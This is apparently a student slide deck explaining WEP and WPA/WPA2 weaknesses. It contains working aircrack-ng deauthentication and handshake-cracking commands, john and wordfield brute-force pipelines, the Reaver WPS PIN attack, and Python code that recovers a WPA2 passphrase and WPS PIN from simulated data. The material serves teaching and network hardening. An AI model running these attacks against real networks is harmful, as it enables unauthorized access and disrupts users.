This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.
1. WPA EXPLOITATION IN
THE WORLD OF WIRELESS
NETWORK
By Hariraj Rathod
8th sem
Department of Electronics and
Communication
2. WIFI – WIRELESS FIDELITY
Wi-Fi is the Wi-Fi Alliance's trademark for IEEE
802.11 wireless LAN products; "wireless fidelity" is a
common expansion, not an official one. It is a popular
technology that allows an electronic device to exchange
data or connect to the internet wirelessly using radio waves.
Wireless access allows users to connect to
the internet from any location within range
of a wireless access point.
3. SOME BASIC TERMS
MAC address or physical address is a unique
identifier assigned to a network interface for
communications on the link layer. It is sent in the
clear in every 802.11 frame header, even on an
encrypted network.
Access point >> the radio that clients associate with
(in home equipment usually built into the wireless router)
SSID (service set identifier) >> Network Name
BSSID (basic service set identifier) >>
MAC address of the access point
4. BASIC WORKING
When a user uses wireless internet they generate
what are called data "packets" (802.11 frames).
Frames are transmitted between the wireless card
and the wireless access point via radio waves
whenever the computer is associated with the
access point.
5. BASIC WORKING CONTD.
The longer a computer stays connected, the more
frames it generates; the more users connected to
one access point, the more frames there are in the air.
This matters to an attacker because the statistical
attacks on WEP need a large volume of captured
ciphertext, and because a WPA handshake is only
observed when a client (re)connects.
7. WIRELESS ENCRYPTION
The main source of vulnerability in wireless
networks is the encryption method in use.
The wireless encryption types are:
WEP
WPA
WPA2
8. WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by its key of 10 or
26 hexadecimal digits (a 40-bit or 104-bit key).
The WEP protocol was not developed by researchers or
experts in security and cryptography.
WEP encrypts with RC4, keyed by the secret key with a
24-bit IV prepended. For a class of weak RC4 keys the
initial bytes of the key stream depend on just a
few bits of the key, and because the IV is sent in the
clear an attacker can pick out the frames that use them.
9. WEP CONTINUED
WEP Encryption Process
ICV:- 32 bit integrity check value, a CRC-32 over the
plaintext (linear, so it does not detect deliberate
bit flips in the ciphertext)
IV:- 24-bit Initialization Vector, sent in the clear
with each frame
10. WEP CONTINUED
WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker
can passively capture large amounts of WEP ciphertext (with the IVs) and use
statistical cryptanalysis to recover the WEP key.
11. WPA OR WPA2
Stands for Wi-Fi Protected Access
Created to provide stronger security than WEP.
Still able to be cracked offline from a captured handshake if a
short or guessable passphrase is used.
If a long random passphrase is used, the PSK mode of these protocols is
not crackable in practice.
WPA-PSK with TKIP (Temporal Key Integrity Protocol) or WPA2-PSK with
AES-CCMP (Advanced Encryption Standard) both use a Pre-Shared Key (PSK)
derived from a passphrase of 8 to 63 printable ASCII characters (or the
256-bit key given directly as 64 hexadecimal digits).
WPS (Wi-Fi Protected Setup) is a simple plug-and-play feature for joining
a network with a PIN or a button press, covered later with Reaver.
12. USING BACKTRACK >>
Some Basic Backtrack Terms >>
wlan1 – the wireless interface
mon0 – the monitor-mode interface that airmon-ng creates on top of it
Handshake –
refers to the WPA/WPA2 4-way handshake exchanged between the
client and the access point when the client (re)connects.
Needed to crack WPA/WPA2: it carries the nonces and a MIC that a
candidate passphrase can be checked against offline.
Dictionary - a file consisting of a list of common
passwords, one per line.
.cap file – the pcap capture file airodump-ng writes its packets to.
13. MONITOR MODE
Monitor mode, or RFMON (Radio Frequency
MONitor) mode, allows a computer with a wireless
network interface controller (WNIC) to monitor all
traffic received from the wireless network.
Monitor mode allows packets to be captured
without having to associate with an access point
first.
14. TOOLS USED
Airmon-ng >> Places a wireless card in monitor mode (creates mon0)
Airodump-ng (packet sniffer) >> Lists the access points and
clients in range and writes the captured frames to a .cap file.
Aireplay-ng (packet injector) >> Aireplay-ng is used to
inject frames.
Its primary function is to generate traffic for later use
in aircrack-ng for cracking WEP and WPA-PSK keys
(for WPA that means deauthenticating a client to capture a handshake).
Aircrack-ng >> Cracks WEP keys (statistically) and WPA/WPA2-PSK
keys (dictionary attack against the captured handshake).
18. AIRCRACK-NG CONTINUED
Deauthenticate a device connected to the access
point and force it to reconnect, so that it repeats the
4-way handshake while airodump-ng is capturing.
aireplay-ng -0 4 -a F4:EC:38:BA:6C:44 -c 90:4C:E5:B2:6F:D8 mon0
where "-0 4" tells aireplay-ng to inject deauthentication
frames (4 of them), "-a" is the access point (BSSID) MAC
address and "-c" is the client (victim) MAC address.
21. AIRCRACK-NG CONTINUED
Cracking the WPA key using aircrack-ng, a dictionary
file and the capture file reddot-01.cap containing the 4-way handshake
aircrack-ng -w /home/pranav/download/password.lst -b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use and "-b" the BSSID
of the target network in the capture.
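What aircrack-ng does with the dictionary file and the captured handshake (slides 11 and 21, and the same loop behind the john and wordfield pipelines that follow), shown as an added Python example that is not part of the slides or of the aircrack-ng code. Because a real capture cannot be shipped with the text, the script first builds a synthetic handshake: the SSID "reddot", the nonces, the wordlist and the passphrase "sunshine1" are constructed test data, and the MACs are the AP/client pair quoted on the slides. It then recovers the passphrase the way aircrack-ng does: PBKDF2 from passphrase and SSID to the PMK, PRF-512 to the PTK, HMAC over EAPOL message 2 to the MIC, compare.

```python
"""Offline WPA2-PSK dictionary attack, as aircrack-ng performs it.

Added example, not from the slides: a synthetic 4-way handshake is built so the
code runs offline, then the passphrase is recovered by deriving the PMK with
PBKDF2, expanding it to the PTK and recomputing the EAPOL message 2 MIC.
The SSID, nonces, wordlist and passphrase are constructed test data; the MACs
are the AP/client pair quoted on the slides.
"""
import hashlib
import hmac
import struct

SSID = "reddot"                                 # constructed
AP_MAC = bytes.fromhex("F4EC38BA6C44")          # BSSID from the slides
STA_MAC = bytes.fromhex("904CE5B26FD8")         # client MAC from the slides
ANONCE = hashlib.sha256(b"anonce").digest()     # constructed 32-byte nonces
SNONCE = hashlib.sha256(b"snonce").digest()
TRUE_PASSPHRASE = "sunshine1"                   # constructed; 8-63 chars as WPA requires
WORDLIST = ["password", "12345678", "qwerty123", "sunshine1", "letmein99"]
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of key-descriptor fields


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). The 4096
    iterations are what make every dictionary candidate expensive to test."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from 802.11i: HMAC-SHA1 counter mode over the label, both MACs and
    both nonces, each pair sorted so AP and client compute the same PTK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]   # KCK = bytes 0-15, KEK = 16-31, TK = 32-63


def eapol_mic(kck, frame_with_zero_mic, key_version=2):
    """EAPOL-Key MIC: HMAC-SHA1 for WPA2/CCMP (key descriptor version 2),
    HMAC-MD5 for WPA/TKIP (version 1); truncated to 16 bytes."""
    digest = hashlib.sha1 if key_version == 2 else hashlib.md5
    return hmac.new(kck, frame_with_zero_mic, digest).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2 (client -> AP) with the SNonce and MIC fields."""
    body = (b"\x02"                      # descriptor type 2 = RSN (WPA2)
            + struct.pack(">H", 0x010A)  # key info: pairwise, MIC set, version 2
            + struct.pack(">H", 0)       # key length
            + struct.pack(">Q", 1)       # replay counter
            + snonce                     # 32-byte SNonce, offset 17
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + mic                        # 16-byte MIC, offset 81
            + struct.pack(">H", 0))      # key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def zero_mic(frame):
    """The MIC is computed over the frame with its own MIC field zeroed."""
    return frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]


def capture_handshake(passphrase):
    """What airodump-ng ends up with after the deauth: message 2 carrying a MIC
    computed by the real client with the real PSK."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE))
    return build_eapol_msg2(SNONCE, mic)


def crack_psk(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """aircrack-ng -w wordlist: for each candidate, PBKDF2 -> PTK -> MIC, compare."""
    snonce = msg2[17:49]
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = zero_mic(msg2)
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), target):
            return candidate
    return None


CAPTURED_MSG2 = capture_handshake(TRUE_PASSPHRASE)

if __name__ == "__main__":
    print("recovered:", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, CAPTURED_MSG2, WORDLIST))
```

Everything the attacker needs is in the clear in the capture (both MACs, both nonces, the MIC); the only secret is the passphrase, and the only cost per guess is the PBKDF2 derivation, which is why the attack is bounded by the wordlist rather than by the protocol. Feeding john or wordfield output into the same loop changes where the candidates come from, not what each one costs.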
22. JOHN THE RIPPER
Used here not as the cracker but as a candidate generator: john's
incremental mode writes guesses to stdout and they are piped into
aircrack-ng, which reads its wordlist from stdin when given "-w -".
This is more flexible than a fixed wordlist, but not faster: the cost
per guess is still aircrack-ng's PBKDF2 computation.
/pentest/password/john-1.7.6.jumbo12/run/john --stdout --incremental=All | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/test-01.cap
23. WORD FIELD
wordfield is a brute-force candidate generator.
Command line: wordfield [OPTION...] MINLENGTH [MAXLENGTH]
"wordfield -a -n 8 8" will output every alphanumeric string
that is exactly 8 characters long.
wordfield -a -n 8 8 | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap
This is only practical against very short or very simple keys: the
8-character alphanumeric space alone is up to 62^8 (about 2.2 x 10^14)
candidates, each costing a PBKDF2 computation in aircrack-ng.
25. DICTIONARY AND BRUTE FORCE LIMITATIONS
The passphrase will not necessarily be in the
dictionary list, so a dictionary attack has its limits.
Brute-force techniques require a lot of fast hardware
(computational power), and each WPA guess costs 4096 HMAC-SHA1 rounds.
Source: http://lastbit.com/pswcalc.asp
26. REAVER TOOL.
Reaver is a tool, written by Craig Heffner, for recovering a
WPA/WPA2 passphrase through the WPS PIN.
The tool attacks the 8-digit WPS PIN.
The last digit is a checksum digit.
That leaves 7 unknown digits, meaning there are 10^7 (10,000,000)
possible PINs, which would take approximately 116 days to break at
1 attempt every second.
29. REAVER TOOL CONTINUED
CRACKING TECHNIQUE
Example WPS PIN 6502-0920: the PIN is checked in two halves, and the
access point's reply reveals whether the first half alone is correct.
First half (4 digits): 10^4 (10,000) combinations.
Second half (4 digits): since the last digit is the checksum, only
10^3 (1,000) combinations.
At most 10,000 + 1,000 = 11,000 attempts instead of 10,000,000,
which reduces the time required to break the PIN to just over 3 hours,
again assuming that 1 attempt is made every second.
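The checksum digit and the split search behind the 11,000-attempt figure, worked through as an added Python example that is not part of the slides or of Reaver. The registrar, its PIN and its replies are constructed test data; the one behaviour modelled is the one the attack depends on, that the access point answers a wrong first half differently from a wrong second half. The slides' PIN 6502-0920 is used as the target, and the checksum function is the one from the WPS specification, so the block also verifies that 0 is the correct checksum digit for 6502092.

```python
"""WPS PIN search as Reaver performs it, reproduced in Python.

Added example, not from the slides or from Reaver: implements the WPS checksum
digit and the split (first half, then second half) search against a simulated
registrar. The registrar, its PIN and its replies are constructed test data
modelling the one fact the attack depends on: the access point answers a
wrong first half differently from a wrong second half.
"""


def wps_checksum(body7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN (WPS specification):
    weighted digit sum, 3x for digits in odd positions counted from the right."""
    accum = 0
    while body7:
        accum += 3 * (body7 % 10)
        body7 //= 10
        accum += body7 % 10
        body7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin8: int) -> bool:
    return pin8 % 10 == wps_checksum(pin8 // 10)


def search_space_sizes():
    """(naive 8-digit brute force, 7 digits + checksum, split search worst case)"""
    return 10**8, 10**7, 10**4 + 10**3


class SimulatedRegistrar:
    """Stand-in for the access point's WPS registrar (constructed). Real Reaver sees
    the same two outcomes on the air: an EAP-NACK after message M4 when the first
    half is wrong, an EAP-NACK after M6 when only the second half is wrong."""

    def __init__(self, pin8: int):
        assert is_valid_pin(pin8)
        self.first, self.second = pin8 // 10000, pin8 % 10000
        self.attempts = 0

    def try_pin(self, first4: int, second4: int) -> str:
        self.attempts += 1
        if first4 != self.first:
            return "nack-after-m4"
        if second4 != self.second:
            return "nack-after-m6"
        return "ok"


def reaver_split_search(reg: SimulatedRegistrar):
    """Return (pin, attempts). Phase 1 fixes the first half (<= 10^4 tries);
    phase 2 enumerates the 3 free digits of the second half and fills in the
    checksum (<= 10^3 tries), so the worst case is 11,000 attempts."""
    first = next(f for f in range(10**4) if reg.try_pin(f, 0) != "nack-after-m4")
    for body in range(10**3):
        second = body * 10 + wps_checksum(first * 1000 + body)
        if reg.try_pin(first, second) == "ok":
            return first * 10000 + second, reg.attempts
    raise RuntimeError("registrar did not behave as modelled")


def hours_at_one_attempt_per_second(attempts: int) -> float:
    return attempts / 3600


if __name__ == "__main__":
    pin, n = reaver_split_search(SimulatedRegistrar(65020920))  # the slides' example PIN
    print(f"recovered {pin:08d} after {n} attempts "
          f"({hours_at_one_attempt_per_second(n):.2f} h at 1 attempt/s)")
```

Phase 2 never sends a PIN with a bad checksum, which is where the factor of ten on the second half comes from; the worst case (first half 9999, second half 999x) is exactly 10,000 + 1,000 attempts, a little over 3 hours at one attempt per second, matching the slide.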